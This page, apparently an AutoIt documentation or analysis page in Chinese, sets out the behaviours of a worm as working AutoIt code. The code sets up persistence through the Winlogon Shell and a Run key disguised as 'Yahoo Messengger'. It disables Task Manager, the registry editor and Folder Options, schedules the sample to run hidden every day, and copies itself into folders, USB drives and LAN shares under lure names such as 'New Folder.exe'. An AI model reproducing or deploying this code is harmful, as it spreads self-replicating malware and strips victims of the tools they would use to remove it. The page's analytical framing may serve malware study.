AutoIt在线文档
注册表行为
设置开机自启
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe " & $name & $exe)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "\" & $name & $exe)
禁用“设置”菜单中的“文件夹选项”
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NofolderOptions","REG_DWORD",1)
禁用任务管理器
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD",1)
禁用注册表
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD",1)
设置计划任务永不停止
RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule","AtTaskMaxHours","REG_DWORD",0)
读取局域网共享文件设置
$a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared")
计划任务行为
用到的函数
注:CMD以隐藏窗口模式执行命令
Func _RunDOS($sCommand)
Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
EndFunc ;==>_RunDOS
取消所有已计划命令
_RunDOS ("AT /delete /yes")
定时运行样本
_RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe)
横向传播行为
用到的函数
Func Search($current)
Local $search = FileFindFirstFile($current & "\*.*")
; 遍历目录所有文件,如果是目录则将样本复制到该目录中,并且样本名字为目录名+$exe
While 1
Dim $file = FileFindNextFile($search)
If @error Or StringLen($file) < 1 Then ExitLoop
If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file <> "." Or $file <> "..") Then
; 判断如果为文件夹且不是.目录和..目录时将样本复制到该目录下名为"目录名.exe"
FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & "\" & $file & $exe,0)
Search($current & "\" & $file)
EndIf
Sleep (1)
WEnd
FileClose($search)
EndFunc
U盘横向传播
Func copyusb()
Dim $usb[10]
$usb[0]=""
$usb[1]=""
$usb[2]=""
; 获取可移动驱动器
$odia = DriveGetDrive("REMOVABLE")
If NOT @error Then
For $i=1 To $odia[0]
$usb[$i]=$odia[$i]
Next
If $usb[1] <>"A:" Then
If $usb [1] <>"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$usb[1] & "\New Folder.exe",0)
Search($usb[1])
EndIf
EndIf
If $usb[1]="A:" Then
If $usb[2]<>"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$usb[2] & "\New Folder.exe",0)
Search($usb[2])
EndIf
EndIf
EndIf
EndFunc
局域网横向传播
Func copynetwork ()
Dim $mang[30]
For $i=1 to 30
$read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares",$i) ; 遍历key
If @error Then ExitLoop
$read = StringReplace ($read,"/","\") ; 替换字符串"/"为"\"
$mang[$i] = "\\" & $read
$checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1) ; 将RVHOST.exe复制到该共享目录下覆盖为New Folder.exe
; 如果成功则开始局域网扩散
If $checkcopy =1 Then
Search($mang[$i])
EndIf
Next
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared","REG_SZ",$mang[$i-1] & "\New Folder.exe")
EndFunc
Comments